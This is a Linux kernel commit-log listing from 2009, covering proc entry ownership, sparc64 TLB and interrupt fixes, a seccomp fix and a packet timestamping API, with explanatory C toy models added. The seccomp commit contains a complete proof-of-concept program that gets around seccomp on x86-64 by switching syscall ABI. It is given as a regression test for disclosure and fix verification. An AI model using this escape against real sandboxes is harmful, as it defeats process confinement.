1. 15 Apr 2009 (3 commits)
  2. 14 Apr 2009 (1 commit)
  3. 08 Apr 2009 (5 commits)
  4. 03 Apr 2009 (3 commits)
  5. 01 Apr 2009 (2 commits)
  6. 31 Mar 2009 (1 commit)
    • proc 2/2: remove struct proc_dir_entry::owner · 99b76233
      Committed by Alexey Dobriyan
      Setting ->owner as done currently (pde->owner = THIS_MODULE) is racy
      as correctly noted at bug #12454. Someone can look up an entry with a NULL
      ->owner, thus not pinning anything, and release it later, resulting
      in module refcount underflow.
      
      We can keep ->owner and supply it at registration time like ->proc_fops
      and ->data.
      
      But this leaves ->owner as an easily manipulated field (just one C
      assignment), and somebody will forget to unpin the previous module and
      pin the current one when switching ->owner. ->proc_fops is declared
      "const", which should be food for thought.
      
      ->read_proc/->write_proc were just fixed to not require ->owner for
      protection.
      
      rmmod'ed directories will be empty and return "." and ".." -- no harm.
      And directories with tricky enough readdir and lookup shouldn't be modular.
      We definitely don't want such modular code.
      
      Removing ->owner will also make PDE smaller.
      
      So, let's nuke it.
      
      Kudos to Jeff Layton for reminding about this, let's say, oversight.
      
      http://bugzilla.kernel.org/show_bug.cgi?id=12454
      
      Signed-off-by: Alexey Dobriyan <adobriyan@gmail.com>
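The race described in this commit message can be replayed with a toy model. This is a minimal sketch, not kernel code: `toy_module`, `toy_pde`, `toy_lookup()` and `toy_release()` are hypothetical stand-ins for the module refcount and the ->owner pin/unpin paths, and the "race" is just a fixed ordering of calls.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-ins for struct module and struct proc_dir_entry (hypothetical names). */
struct toy_module { int refcount; };
struct toy_pde    { struct toy_module *owner; };

/* Lookup pins the owner only if ->owner is already set at this moment. */
static void toy_lookup(struct toy_pde *pde)
{
	if (pde->owner)
		pde->owner->refcount++;
}

/* Release unpins whatever ->owner holds now, not what lookup saw. */
static void toy_release(struct toy_pde *pde)
{
	if (pde->owner)
		pde->owner->refcount--;
}

/* Replays the racy ordering and returns the module's final refcount. */
static int toy_replay_race(void)
{
	struct toy_module mod = { 0 };
	struct toy_pde pde = { NULL };	/* registered, ->owner not assigned yet */

	toy_lookup(&pde);		/* pins nothing: ->owner is still NULL */
	assert(mod.refcount == 0);
	pde.owner = &mod;		/* the late "pde->owner = THIS_MODULE" */
	toy_release(&pde);		/* drops a reference that was never taken */
	return mod.refcount;
}
```

In this model `toy_replay_race()` ends with a refcount of -1, which is the underflow the message refers to. Removing the field altogether removes the window between registration and assignment.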
  7. 30 Mar 2009 (4 commits)
  8. 28 Mar 2009 (1 commit)
  9. 27 Mar 2009 (2 commits)
    • sparc64: Fix MM refcount check in smp_flush_tlb_pending(). · f9384d41
      Committed by David S. Miller
      As explained by Benjamin Herrenschmidt:
      
      > CPU 0 is running the context, task->mm == task->active_mm == your
      > context. The CPU is in userspace happily churning things.
      >
      > CPU 1 used to run it, not anymore, it's now running fancyfsd which
      > is a kernel thread, but current->active_mm still points to that
      > same context.
      >
      > Because there's only one "real" user, mm_users is 1 (but mm_count is
      > elevated; it's just that the presence on CPU 1 as active_mm has no
      > effect on mm_users).
      >
      > At this point, fancyfsd decides to invalidate a mapping currently mapped
      > by that context, for example because a networked file has changed
      > remotely or something like that, using unmap_mapping_ranges().
      >
      > So CPU 1 goes into the zapping code, which eventually ends up calling
      > flush_tlb_pending(). Your test will succeed, as current->active_mm is
      > indeed the target mm for the flush, and mm_users is indeed 1. So you
      > will -not- send an IPI to the other CPU, and CPU 0 will continue happily
      > accessing the pages that should have been unmapped.
      
      To fix this problem, check ->mm instead of ->active_mm, and this
      means:
      
      > So if you test current->mm, you effectively account for mm_users == 1,
      > so the only way the mm can be active on another processor is as a lazy
      > mm for a kernel thread. So your test should work properly as long
      > as you don't have a HW that will do speculative TLB reloads into the
      > TLB on that other CPU (and even if you do, your flush-on-switch-in should
      > get rid of any crap here).
      
      And therefore we should be OK.
      Signed-off-by: David S. Miller <davem@davemloft.net>
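The difference between the two tests can be sketched in a few lines. This is an illustration under stated assumptions, not the sparc64 source: `toy_mm`, `toy_task` and the two predicate functions are hypothetical, and the real code reads mm_users atomically.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-ins for mm_struct and task_struct (hypothetical names). */
struct toy_mm   { int mm_users; };
struct toy_task { struct toy_mm *mm; struct toy_mm *active_mm; };

/* Old test: trusts ->active_mm, which a kernel thread merely borrows. */
static bool old_check_skips_cross_call(const struct toy_task *cur,
				       const struct toy_mm *mm)
{
	return cur->active_mm == mm && mm->mm_users == 1;
}

/* New test: only a task that really owns the mm may skip the cross-call. */
static bool new_check_skips_cross_call(const struct toy_task *cur,
				       const struct toy_mm *mm)
{
	return cur->mm == mm && mm->mm_users == 1;
}

/* Builds the kernel thread from the quoted scenario: it has no mm of its
 * own and lazily keeps `mm` as its active_mm. */
static struct toy_task toy_lazy_kthread(struct toy_mm *mm)
{
	struct toy_task t = { NULL, mm };

	assert(mm != NULL);
	return t;
}
```

For a task built with `toy_lazy_kthread()` and an mm whose mm_users is 1, the old predicate returns true (no cross-call, so the other CPU keeps stale TLB entries) while the new one returns false.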
    • sparc64: Fix build of timer_interrupt(). · e2ab3dff
      Committed by David Miller
      arch/sparc/kernel/time_64.c: In function ‘timer_interrupt’:
        arch/sparc/kernel/time_64.c:732: error: ‘struct kernel_stat’ has no member named ‘irqs’
        make[1]: *** [arch/sparc/kernel/time_64.o] Error 1
      Signed-off-by: David S. Miller <davem@davemloft.net>
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
  10. 26 Mar 2009 (1 commit)
  11. 19 Mar 2009 (3 commits)
  12. 16 Mar 2009 (10 commits)
  13. 05 Mar 2009 (1 commit)
    • sparc64: Fix lost interrupts on sun4u. · d0cac39e
      Committed by David S. Miller
      Based upon a report by Meelis Roos.
      
      Sparc64 SBUS and PCI controllers use a combination of IMAP and ICLR
      registers to manage device interrupts.
      
      The IMAP register contains the "valid" enable bit as well as CPU
      targeting information.  The ICLR register, by contrast, is written
      with zero at the end of handling an interrupt to reset the state
      machine for that interrupt to IDLE so it can be sent again.
      
      For PCI slot and SBUS slot devices we can have multiple interrupts
      sharing the same IMAP register.  There are individual ICLR registers
      but only one IMAP register for managing those.
      
      We represent each shared case with individual virtual IRQs so the
      generic IRQ layer thinks there is only one user of the IRQ instance.
      
      In such shared IMAP cases this is wrong, so if there are multiple
      active users then a free_irq() call will prematurely turn off the
      interrupt by clearing the Valid bit in the IMAP register even though
      there are other active users.
      
      Fix this by simply doing nothing in sun4u_disable_irq() and checking
      IRQF_DISABLED during IRQ dispatch.
      
      This situation doesn't exist in the hypervisor sun4v cases, so I left
      those alone.
      Tested-by: Meelis Roos <mroos@linux.ee>
      Signed-off-by: David S. Miller <davem@davemloft.net>
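The shared-IMAP problem and the fix can be modelled as follows. This is a rough sketch with hypothetical names (`toy_imap`, `toy_virq`, `toy_free_irq()`, `toy_delivers()`); it assumes the generic layer marks the virtual IRQ as disabled before calling the hardware hook, and it ignores ICLR handling entirely.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* One IMAP register (Valid bit only) shared by several virtual IRQs. */
struct toy_imap { bool valid; };
struct toy_virq { struct toy_imap *imap; bool disabled; };

/* Old hardware hook: clears the Valid bit that other users also rely on. */
static void old_hw_disable(struct toy_virq *v)
{
	v->imap->valid = false;
}

/* New hardware hook: deliberately does nothing. */
static void new_hw_disable(struct toy_virq *v)
{
	(void)v;
}

/* Stand-in for free_irq(): the generic layer marks the virtual IRQ as
 * disabled, then calls the hardware hook. */
static void toy_free_irq(struct toy_virq *v,
			 void (*hw_disable)(struct toy_virq *))
{
	assert(v != NULL && hw_disable != NULL);
	v->disabled = true;
	hw_disable(v);
}

/* Dispatch: deliver only if the IMAP is valid and this IRQ is not disabled. */
static bool toy_delivers(const struct toy_virq *v)
{
	return v->imap->valid && !v->disabled;
}
```

With two `toy_virq` instances pointing at the same `toy_imap`, freeing one through `old_hw_disable` stops delivery for both, while freeing it through `new_hw_disable` silences only the freed one.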
  14. 03 Mar 2009 (1 commit)
    • x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Committed by Roland McGrath
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process can make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <sys/prctl.h>	/* declares prctl(); pulls in <linux/prctl.h> */
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: Roland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
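Why the wrong table matters can be shown with a small model of the mode-1 check. This is a sketch under assumptions, not the kernel's secure_computing(): `toy_call` and `toy_seccomp_allows()` are hypothetical, the two booleans only imitate TIF_IA32 (a per-task property) and TS_COMPAT (how this particular syscall entered the kernel), and the tables hold the x86-64 and i386 numbers for read, write, exit and sigreturn.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Syscalls allowed in seccomp mode 1; the numbers differ per ABI. */
static const int allowed_64[] = { 0, 1, 60, 15 };  /* read, write, exit, rt_sigreturn */
static const int allowed_32[] = { 3, 4, 1, 119 };  /* read, write, exit, sigreturn */

struct toy_call {
	bool task_is_ia32;	/* imitates TIF_IA32: how the process was started */
	bool entered_compat;	/* imitates TS_COMPAT: how this syscall entered */
	int nr;			/* syscall number as passed in the register */
};

static bool in_table(const int *table, size_t n, int nr)
{
	assert(table != NULL);
	for (size_t i = 0; i < n; i++)
		if (table[i] == nr)
			return true;
	return false;
}

/* use_ts_compat == false models the buggy check, true models the fix. */
static bool toy_seccomp_allows(const struct toy_call *c, bool use_ts_compat)
{
	bool compat = use_ts_compat ? c->entered_compat : c->task_is_ia32;

	return compat ? in_table(allowed_32, 4, c->nr)
		      : in_table(allowed_64, 4, c->nr);
}
```

The -m64 case of the test program corresponds to `{ false, true, 15 }`: number 15 is rt_sigreturn in the 64-bit table but chmod in the 32-bit ABI that int $0x80 actually dispatches to. The -m32 case corresponds to `{ true, false, 4 }`: number 4 is write in the 32-bit table but stat in the 64-bit ABI. The buggy selection allows both and the fixed one rejects both.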
  15. 16 Feb 2009 (1 commit)
    • net: new user space API for time stamping of incoming and outgoing packets · cb9eff09
      Committed by Patrick Ohly
      User space can request hardware and/or software time stamping.
      Reporting of the result(s) via a new control message is enabled
      separately for each field in the message because some of the
      fields may require additional computation and thus cause overhead.
      User space can tell the different kinds of time stamps apart
      and choose what suits its needs.
      
      When a TX timestamp operation is requested, the TX skb will be cloned
      and the clone will be time stamped (in hardware or software) and added
      to the socket error queue of the skb, if the skb has a socket
      associated with it.
      
      The actual TX timestamp will reach userspace as a RX timestamp on the
      cloned packet. If timestamping is requested and no timestamping is
      done in the device driver (potentially this may use hardware
      timestamping), it will be done in software after the device's
      hard_start_xmit routine.
      Signed-off-by: Patrick Ohly <patrick.ohly@intel.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
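From user space, a request for software time stamps might look like the sketch below. It assumes a Linux system whose headers provide SO_TIMESTAMPING and the SOF_TIMESTAMPING_* flags from <linux/net_tstamp.h>; the helper names `sw_timestamping_flags()` and `enable_sw_timestamping()` are made up for illustration. Reading the stamps back (recvmsg() control messages, and the socket error queue for TX stamps) is not shown.

```c
#include <assert.h>
#include <sys/socket.h>
#include <linux/net_tstamp.h>

/* Request software TX and RX stamps, and ask for the software field to be
 * reported in the control message. */
static int sw_timestamping_flags(void)
{
	return SOF_TIMESTAMPING_TX_SOFTWARE |
	       SOF_TIMESTAMPING_RX_SOFTWARE |
	       SOF_TIMESTAMPING_SOFTWARE;
}

/* Enables software time stamping on an open socket.
 * Returns 0 on success, -1 with errno set on failure (as setsockopt does). */
static int enable_sw_timestamping(int fd)
{
	int flags = sw_timestamping_flags();

	assert(fd >= 0);
	return setsockopt(fd, SOL_SOCKET, SO_TIMESTAMPING,
			  &flags, sizeof flags);
}
```

Generation and reporting are separate bits, which matches the message's point that reporting is enabled per field: a caller that only wants hardware stamps would combine the corresponding hardware flags instead.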
  16. 11 Feb 2009 (1 commit)